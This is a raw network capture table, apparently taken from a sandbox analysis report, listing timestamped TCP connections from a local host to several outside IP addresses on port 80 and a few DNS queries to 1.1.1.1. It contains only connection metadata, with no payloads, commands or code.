                                                                                                                                                  Nov 14, 2024 15:41:53.768357992 CET5001380192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:53.773514986 CET80500133.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:54.782999992 CET5001480192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:54.788444996 CET80500143.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:54.788582087 CET5001480192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:54.797796011 CET5001480192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:54.803095102 CET80500143.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:54.804550886 CET80500143.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:55.421422005 CET80500143.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:55.421503067 CET5001480192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:56.311656952 CET5001480192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:56.317177057 CET80500143.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:57.329895020 CET5001580192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:57.335478067 CET80500153.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:57.335573912 CET5001580192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:57.341712952 CET5001580192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:57.347661972 CET80500153.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:57.997410059 CET80500153.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:58.029865980 CET80500153.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:58.036459923 CET5001580192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:58.044614077 CET5001580192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:41:58.050106049 CET80500153.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:04.412580967 CET5001680192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:04.418097019 CET805001647.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:04.418349028 CET5001680192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:04.436578989 CET5001680192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:04.441977978 CET805001647.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:05.386183977 CET805001647.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:05.436840057 CET5001680192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:05.789741039 CET805001647.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:05.789805889 CET805001647.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:05.790424109 CET5001680192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:05.937002897 CET5001680192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:06.955049038 CET5001780192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:06.962095022 CET805001747.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:06.962204933 CET5001780192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:06.972146988 CET5001780192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:06.978739023 CET805001747.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:07.926253080 CET805001747.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:07.983876944 CET5001780192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:08.107893944 CET805001747.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:08.108753920 CET5001780192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:08.483843088 CET5001780192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:09.502094984 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:09.509275913 CET805001847.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:09.509356976 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:09.518564939 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:09.526201010 CET805001847.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:09.526344061 CET805001847.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:10.511049986 CET805001847.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:10.564706087 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:10.697789907 CET805001847.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:10.697849035 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:11.030749083 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:12.052757978 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:12.057835102 CET805001947.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:12.060858965 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:12.066786051 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:12.072191000 CET805001947.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:13.143342972 CET805001947.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:13.186990976 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:13.249778986 CET805001947.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:13.249910116 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:13.250638008 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:13.255530119 CET805001947.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:18.362597942 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:18.367768049 CET805002023.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:18.367892981 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:18.379656076 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:18.385386944 CET805002023.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:19.205506086 CET805002023.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:19.249603033 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:19.289706945 CET805002023.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:19.289772987 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:19.892649889 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:20.909214020 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:20.914489031 CET805002123.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:20.914565086 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:20.927007914 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:20.932246923 CET805002123.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:21.730305910 CET805002123.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:21.780997992 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:21.834111929 CET805002123.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:21.837616920 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:22.437377930 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:23.457007885 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:23.462120056 CET805002223.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:23.462296963 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:23.472651958 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:23.478780985 CET805002223.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:23.480084896 CET805002223.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:24.278050900 CET805002223.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:24.329129934 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:24.388907909 CET805002223.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:24.389137983 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:24.984294891 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.003333092 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.009004116 CET805002323.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:26.011250019 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.017354012 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.022295952 CET805002323.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:26.817015886 CET805002323.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:26.859093904 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.921355963 CET805002323.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:26.921473980 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.922657967 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.927669048 CET805002323.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:40.256431103 CET5002480192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:40.263499022 CET8050024208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:40.263588905 CET5002480192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:40.278240919 CET5002480192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:40.283381939 CET8050024208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:40.874614954 CET8050024208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:40.874721050 CET5002480192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:41.785336018 CET5002480192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:41.790277004 CET8050024208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:42.801103115 CET5002580192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:42.806292057 CET8050025208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:42.806364059 CET5002580192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:42.821852922 CET5002580192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:42.826766968 CET8050025208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:43.462970972 CET8050025208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:43.463037014 CET5002580192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:44.328254938 CET5002580192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:44.334006071 CET8050025208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:45.346318960 CET5002680192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:45.351778030 CET8050026208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:45.351861000 CET5002680192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:45.360934019 CET5002680192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:45.369752884 CET8050026208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:45.370615005 CET8050026208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:45.943895102 CET8050026208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:45.944113016 CET5002680192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:46.875155926 CET5002680192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:47.126734018 CET8050026208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:47.896419048 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:47.902637959 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:47.903172016 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:47.909849882 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:47.914741039 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:49.098988056 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:49.099042892 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:49.099055052 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:49.099082947 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:49.100887060 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:49.100946903 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:49.102271080 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:49.107309103 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:54.155585051 CET5002880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:54.160573006 CET80500283.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:54.160979986 CET5002880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:54.225327969 CET5002880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:54.230535030 CET80500283.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:55.734741926 CET5002880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:55.780798912 CET80500283.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:56.756206989 CET5002980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:56.761142969 CET80500293.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:56.761220932 CET5002980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:56.786191940 CET5002980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:56.791254044 CET80500293.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:57.456154108 CET80500293.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:57.456299067 CET5002980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:58.297344923 CET5002980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:58.308584929 CET80500293.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:59.315922022 CET5003080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:59.321075916 CET80500303.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:59.321135044 CET5003080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:59.335459948 CET5003080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:59.340666056 CET80500303.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:59.340709925 CET80500303.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:59.950016022 CET80500303.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:59.953753948 CET5003080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:00.844558001 CET5003080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:00.849652052 CET80500303.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:01.869014025 CET5003180192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:01.873891115 CET80500313.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:01.876146078 CET5003180192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:01.889480114 CET5003180192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:01.894428015 CET80500313.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:02.529592037 CET80500313.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:02.529997110 CET80500313.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:02.530092955 CET5003180192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:02.532561064 CET5003180192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:02.537405014 CET80500313.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:02.638741970 CET80500283.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:02.638816118 CET5002880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:19.116300106 CET5003280192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:19.121659040 CET80500323.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:19.123367071 CET5003280192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:19.129043102 CET5003280192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:19.135235071 CET80500323.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:19.819178104 CET80500323.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:19.819338083 CET80500323.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:19.819348097 CET80500323.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:19.819484949 CET5003280192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:19.821546078 CET5003280192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:43:19.826644897 CET80500323.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:24.831382036 CET5003380192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:24.836688995 CET8050033217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:24.836798906 CET5003380192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:24.846137047 CET5003380192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:24.851803064 CET8050033217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:25.663518906 CET8050033217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:25.704160929 CET5003380192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:25.774111032 CET8050033217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:25.774187088 CET5003380192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:26.360649109 CET5003380192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:27.378350973 CET5003480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:27.383676052 CET8050034217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:27.383759975 CET5003480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:27.393357038 CET5003480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:27.398765087 CET8050034217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:28.262522936 CET8050034217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:28.314340115 CET5003480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:28.324351072 CET8050034217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:28.324593067 CET5003480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:28.907130003 CET5003480192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:29.925153971 CET5003580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:29.930599928 CET8050035217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:29.930732965 CET5003580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:29.940295935 CET5003580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:29.945478916 CET8050035217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:29.945597887 CET8050035217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:31.025857925 CET8050035217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:31.025933981 CET8050035217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:31.025964022 CET8050035217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:31.026254892 CET5003580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:31.454041958 CET5003580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:32.473769903 CET5003680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:32.482666969 CET8050036217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:32.482841015 CET5003680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:32.492810965 CET5003680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:32.498001099 CET8050036217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:33.305784941 CET8050036217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:33.305825949 CET8050036217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:33.305862904 CET8050036217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:33.306082964 CET5003680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:33.360435009 CET5003680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:33.415591955 CET8050036217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:33.415755033 CET5003680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:33.416924953 CET5003680192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:43:33.421938896 CET8050036217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:38.426393986 CET5003780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:38.431370974 CET8050037199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:38.434529066 CET5003780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:38.443517923 CET5003780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:38.448522091 CET8050037199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:39.095066071 CET8050037199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:39.095204115 CET8050037199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:39.095262051 CET5003780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:39.095542908 CET8050037199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:39.095619917 CET5003780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:39.954391003 CET5003780192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:40.972270012 CET5003880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:40.977816105 CET8050038199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:40.977929115 CET5003880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:40.988610983 CET5003880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:40.995362043 CET8050038199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:41.636209965 CET8050038199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:41.636749029 CET8050038199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:41.636821032 CET5003880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:41.668056011 CET8050038199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:41.668143034 CET5003880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:42.502192974 CET5003880192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:43.518861055 CET5003980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:43.526492119 CET8050039199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:43.526573896 CET5003980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:43.534837961 CET5003980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:43.542951107 CET8050039199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:43.542979002 CET8050039199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:44.225358963 CET8050039199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:44.225905895 CET8050039199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:44.226041079 CET5003980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:44.261506081 CET8050039199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:44.261590004 CET5003980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:45.048144102 CET5003980192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:46.066188097 CET5004080192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:46.071434021 CET8050040199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:46.071647882 CET5004080192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:46.079344988 CET5004080192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:46.084486961 CET8050040199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:46.729651928 CET8050040199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:46.729964972 CET8050040199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:46.729974985 CET8050040199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:46.730119944 CET5004080192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:46.734069109 CET5004080192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:43:46.758075953 CET8050040199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:46.758137941 CET8050040199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:46.758258104 CET5004080192.168.2.5199.59.243.227

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 14, 2024 15:39:39.799484015 CET5196953192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:39:39.925853968 CET53519691.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:55.625530005 CET5869053192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:39:55.694902897 CET53586901.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:09.297338009 CET5267353192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:40:09.371701002 CET53526731.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:22.719587088 CET6162753192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:40:23.005467892 CET53616271.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:36.533797026 CET5537853192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:40:36.694467068 CET53553781.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:50.081841946 CET6011053192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:40:50.553510904 CET53601101.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:04.407363892 CET5872353192.168.2.51.1.1.1
